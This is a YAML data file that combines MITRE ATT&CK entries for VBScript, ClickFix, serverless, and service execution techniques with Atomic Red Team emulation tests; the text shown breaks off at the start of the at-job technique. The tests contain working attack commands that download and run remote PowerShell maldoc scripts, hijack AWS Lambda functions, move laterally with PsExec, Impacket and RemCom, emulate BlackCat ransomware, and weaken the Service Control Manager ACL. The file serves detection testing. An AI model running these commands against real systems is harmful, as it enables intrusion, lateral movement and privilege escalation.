Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.5'
x_mitre_remote_support: false
identifier: T1059.005
atomic_tests:
- name: Visual Basic script execution to gather local computer information
auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9
description: |-
Visual Basic execution test, execute vbscript via PowerShell.
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
supported_platforms:
- windows
input_arguments:
vbscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.005\src\sys_info.vbs
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{vbscript})
prereq_command: 'if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path "#{vbscript}") -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
executor:
command: 'cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt
'
cleanup_command: Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
- name: Encoded VBS code execution
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
description: |
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
'
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
'
name: powershell
- name: Extract Memory via VBA
auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
description: |
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
-officeProduct \"Word\" -sub \"Extract\"\n"
cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
-ErrorAction Ignore
'
name: powershell
T1204.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e261a979-f354-41a8-963e-6cadac27c4bf
created: '2025-03-18T12:57:50.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1204/004
external_id: T1204.004
- source_name: AhnLab Malicioys Copy Paste 2024
description: AhnLab SEcurity intelligence Center. (2024, May 23). Warning
Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V).
Retrieved April 23, 2025.
url: https://asec.ahnlab.com/en/73952/
- source_name: AhnLab LummaC2 2025
description: AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer
LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April
23, 2025.
url: https://asec.ahnlab.com/en/85699/
- source_name: Reliaquest CAPTCHA 2024
description: 'Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise:
Hackers Flip the Script. Retrieved March 18, 2025.'
url: https://www.reliaquest.com/blog/using-captcha-for-compromise/
- source_name: Sekoia ClickFake 2025
description: 'Amaury G., Coline Chavane, Felix Aimé and Sekoia TDR. (2025,
March 31). From Contagious to ClickFake Interview: Lazarus leveraging the
ClickFix tactic. Retrieved April 1, 2025.'
url: https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
- source_name: CloudSEK Lumma Stealer 2024
description: 'CloudSEK TRIAD. (2024, September 19). Unmasking the Danger:
Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.'
url: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
- source_name: Proofpoint ClickFix 2024
description: 'Tommy Madjar, Selena Larson and The Proofpoint Threat Research
Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique
Floods Threat Landscape. Retrieved March 18, 2025.'
url: https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-05T17:30:01.834Z'
name: Malicious Copy and Paste
description: "An adversary may rely upon a user copying and pasting code in
order to gain execution. Users may be subjected to social engineering to get
them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
One such strategy is \"ClickFix,\" in which adversaries present users with
seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that
instead instruct the user to copy and paste malicious code.\n\nMalicious websites,
such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189),
may present fake error messages or CAPTCHA prompts that instruct users to
open a terminal or the Windows Run Dialog box and execute an arbitrary command.
These commands may be obfuscated using encoding or other techniques to conceal
malicious intent. Once executed, the adversary will typically be able to establish
a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation:
Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab
LummaC2 2025)\n\nAdversaries may also leverage phishing emails for this purpose.
When a user attempts to open an attachment, they may be presented with a fake
error and offered a malicious command to paste as a solution, consistent with
the \"ClickFix\" strategy.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab
Malicioys Copy Paste 2024)\n\nTricking a user into executing a command themselves
may help to bypass email filtering, browser sandboxing, or other mitigations
designed to protect users against malicious downloaded files. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Ale Houspanossian
- Fernando Bacchin
- Gabriel Currie
- Harikrishnan Muthu, Cyble
- Menachem Goldstein
- ReliaQuest
- SeungYoul Yoo, Ahn Lab
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.1'
x_mitre_remote_support: false
atomic_tests: []
T1648:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3
created: '2022-05-27T13:19:51.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1648
external_id: T1648
- source_name: Microsoft DART Case Report 001
description: Berk Veral. (2020, March 9). Real-life cybercrime stories from
DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.
url: https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team
- source_name: Backdooring an AWS account
description: Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved
May 27, 2022.
url: https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9
- source_name: Varonis Power Automate Data Exfiltration
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
- source_name: Cloud Hack Tricks GWS Apps Script
description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
2024.
url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
- source_name: OWN-CERT Google App Script 2024
description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
analysis. Retrieved October 2, 2024.
url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
url: https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/
- source_name: Rhino Security Labs AWS Privilege Escalation
description: Rhino Security Labs. (n.d.). AWS IAM Privilege Escalation – Methods
and Mitigation. Retrieved May 27, 2022.
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
- source_name: Rhingo Security Labs GCP Privilege Escalation
description: Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud
Platform – Part 1 (IAM). Retrieved May 27, 2022.
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:59:17.861Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
offer a variety of serverless resources, including compute engines, application
integration services, and web servers. \n\nAdversaries may abuse these resources
in various ways as a means of executing arbitrary commands. For example, adversaries
may use serverless functions to execute malicious code, such as crypto-mining
malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation:
Cado Security Denonia) Adversaries may also create functions that enable further
compromise of the cloud environment. For example, an adversary may use the
`IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission
in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)
to a serverless cloud function, which may then be able to perform actions
the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation:
Rhingo Security Labs GCP Privilege Escalation)\n\nServerless functions can
also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)),
potentially enabling persistent execution over time. For example, in AWS environments,
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
a new user is created.(Citation: Backdooring an AWS account) This is also
possible in many cloud-based office application suites. For example, in Microsoft
365 environments, an adversary may create a Power Automate workflow that forwards
all emails a user receives or creates anonymous sharing links whenever a user
is granted access to a document in SharePoint.(Citation: Varonis Power Automate
Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
environments, they may instead create an Apps Script that exfiltrates a user's
data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
- Oleg Kolesnikov, Securonix
- Cisco
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
- OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- Office Suite
x_mitre_version: '1.2'
identifier: T1648
atomic_tests:
- name: Lambda Function Hijack
auto_generated_guid: 87a4a141-c2bb-49d1-a604-8679082d8b91
description: 'Modify an existing Lambda function to execute arbitrary code.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
region:
description: AWS region to deploy the EC2 instance
type: string
default: us-east-2
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
- description: 'Terraform must be installed.
'
prereq_command: 'terraform --version
'
get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
'
executor:
command: |
Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1"
Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
Invoke-LambdaAttack -AWSProfile "T1648-1" -AWSRegion $region
cleanup_command: |
Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
Remove-MaliciousUser -AWSProfile "T1648-1"
Remove-TFFiles -Path "PathToAtomicsFolder/T1648/src/T1648-1/"
name: powershell
T1204.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
created: '2020-03-11T14:43:31.706Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1204/001
external_id: T1204.001
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.144Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
them to click on a link that will lead to code execution. This user action
will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).
Clicking on a link may also lead to other execution techniques such as exploitation
of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
Links may also lead users to download files that require execution via [Malicious
File](https://attack.mitre.org/techniques/T1204/002).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.2'
x_mitre_remote_support: false
atomic_tests: []
T1569.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
created: '2020-03-10T18:33:36.159Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1569/002
external_id: T1569.002
- source_name: Microsoft Service Control Manager
description: Microsoft. (2018, May 31). Service Control Manager. Retrieved
March 28, 2020.
url: https://docs.microsoft.com/windows/win32/services/service-control-manager
- source_name: Russinovich Sysinternals
description: Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11.
Retrieved May 13, 2015.
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.506Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
x_mitre_remote_support: false
identifier: T1569.002
atomic_tests:
- name: Execute a Command as a Service
auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1
description: "Creates a service specifying an arbitrary command and executes
it. When executing commands such as PowerShell, the service will report that
it did not start correctly even when code executes properly.\n\nUpon successful
execution, cmd.exe creates a new service using sc.exe that will start powershell.exe
to create a new file `art-marker.txt`\n\n[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)
\ \n[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)\n"
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of service to create
type: string
default: ARTService
executable_command:
description: Command to execute as a service
type: string
default: "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType
File C:\\art-marker.txt"
executor:
command: |
sc.exe create #{service_name} binPath= "#{executable_command}"
sc.exe start #{service_name}
sc.exe delete #{service_name}
cleanup_command: 'del C:\art-marker.txt >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Use PsExec to execute a command on a remote host
auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c
description: |
Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
Will start a process on a remote host.
Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).
supported_platforms:
- windows
input_arguments:
remote_host:
description: Remote hostname or IP address
type: string
default: localhost
user_name:
description: Username
type: string
default: DOMAIN\Administrator
password:
description: Password
type: string
default: P@ssw0rd1
dependency_executor_name: powershell
dependencies:
- description: 'PsExec tool from Sysinternals must exist in the ExternalPayloads
directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{remote_host}
-i -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
'
name: command_prompt
elevation_required: true
- name: psexec.py (Impacket)
auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35
description: 'Will execute a command on the remote host with Impacket psexec.py
script.
'
supported_platforms:
- linux
input_arguments:
remote_host:
description: Remote hostname or IP address
type: string
default: 127.0.0.1
username:
description: Username
type: string
default: Administrator
domain:
description: Target domain
type: string
default: ''
password:
description: Password
type: string
default: P@ssw0rd1
command:
description: Command to execute in target computer
type: string
default: whoami
dependency_executor_name: bash
dependencies:
- description: 'psexec.py (Impacket)
'
prereq_command: 'if [ -x "$(command -v psexec.py)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'sudo pip3 install impacket
'
executor:
command: 'psexec.py ''#{domain}/#{username}:#{password}@#{remote_host}'' ''#{command}''
'
name: bash
- name: BlackCat pre-encryption cmds with Lateral Movement
auto_generated_guid: 31eb7828-97d7-4067-9c1e-c6feb85edc4b
description: This atomic attempts to emulate the unique behavior of BlackCat
ransomware prior to encryption and during Lateral Movement attempts via PsExec
on Windows. Uses bundled PsExec like BlackCat
supported_platforms:
- windows
input_arguments:
targethost:
description: Target hostname to attempt psexec connection to for emulation
of lateral movement.
type: string
default: "$ENV:COMPUTERNAME"
dependencies:
- description: 'PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe")
{exit 0} else {exit 1}
'
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
executor:
command: "cmd.exe /c \"wmic \tcsproduct \tget UUID\" \ncmd.exe /c \"fsutil
behavior \tset SymlinkEvaluation R2L:1\" \ncmd.exe /c \"fsutil behavior
set \tSymlinkEvaluation R2R:1\"\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
\ /v MaxMpxCt /d 65535 /t REG_DWORD /f \ncopy \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\"
$env:temp\ncmd.exe /c \"$env:temp\\psexec.exe -accepteula \\\\#{targethost}
cmd.exe /c echo \"--access-token\"\"\n"
cleanup_command: "reg delete HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
/v MaxMpxCt /f\ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2L:0\"
\ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2R:0\"\nrm $env:temp\\psexec.exe\n"
name: powershell
elevation_required: true
- name: Use RemCom to execute a command on a remote host
auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
description: |
Requires having RemCom installed, path to RemCom is one of the input input_arguments
Will start a process on a remote host.
Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
supported_platforms:
- windows
input_arguments:
remote_host:
description: Remote hostname or IP address
type: string
default: localhost
user_name:
description: Username
type: string
default: Administrator
password:
description: Password
type: string
default: P@ssw0rd1
dependency_executor_name: powershell
dependencies:
- description: 'RemCom tool must exist on disk in the ExternalPayloads folder
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe"
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\remcom.exe" \\#{remote_host}
/user:#{user_name} /pwd:#{password} cmd.exe
'
name: command_prompt
- name: Snake Malware Service Create
auto_generated_guid: b8db787e-dbea-493c-96cb-9272296ddc49
description: "The following Atomic Test will create a new service named WerFaultSvc
with a binary path of WinSxS\\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\\WerFault.exe.\nThis
was recently seen in the Snake Malware report. \nUpon execution, sc.exe will
create a new service named WerFaultSvc with a bin path \\WinSxS\\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\\WerFault.exe
and a display name of WerFault Service.\n[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
\ \n"
supported_platforms:
- windows
executor:
command: 'sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe"
DisplayName= "WerFault Service" start= auto
'
cleanup_command: 'sc.exe delete "WerFaultSvc"
'
name: command_prompt
elevation_required: true
- name: Modifying ACL of Service Control Manager via SDET
auto_generated_guid: bf07f520-3909-4ef5-aa22-877a50f2f77b
description: "Modify permissions of Service Control Manager via SDSET. This
allows any administrative user to escalate privilege and create a service
with SYSTEM level privileges.Restart is required.\n[Blog](https://0xv1n.github.io/posts/scmanager/)
\ \n"
supported_platforms:
- windows
executor:
command: 'sc.exe sdset scmanager D:(A;;KA;;;WD)
'
name: command_prompt
elevation_required: true
- name: Pipe Creation - PsExec Tool Execution From Suspicious Locations
auto_generated_guid: 004a5d68-627b-452d-af3d-43bd1fc75a3b
description: Requires PsExec tool installed. BlackCat Ransomeware tried to propagate
by creating pipe using PsExec process executing from suspicious locations
(In the particular case the legitimate PsExec executable is embedded within
the Windows variant and is dropped in the victim’s %TEMP% directory). pon
successful execution, PsExec will be executed from suspicious location and
create a new pipe to execute CMD.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'PsExec tool from Sysinternals must exist in the ''\Users\Public\Temp\''
directory
'
prereq_command: 'if (Get-ChildItem -Path C:\ -Include *psexec* -File -Recurse
-ErrorAction SilentlyContinue) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "C:\Users\Public\Temp\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\Users\Public\Temp\PSTools.zip"
Expand-Archive "C:\Users\Public\Temp\PsTools.zip" "C:\Users\Public\Temp\" -Force
executor:
command: "cd C:\\Users\\Public\\Temp\\ \n.\\PsExec.exe -i -s cmd -accepteula"
name: powershell
elevation_required: true
T1053.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0
created: '2019-11-27T13:52:45.853Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/002
external_id: T1053.002
- source_name: rowland linux at 2019
description: Craig Rowland. (2019, July 25). Getting an Attacker IP Address
from a Malicious Linux At Job. Retrieved October 15, 2021.
url: https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/
- source_name: GTFObins at
description: Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved
September 28, 2021.
url: https://gtfobins.github.io/gtfobins/at/
- source_name: Linux at
description: IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved
February 25, 2022.
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
September 12, 2024.
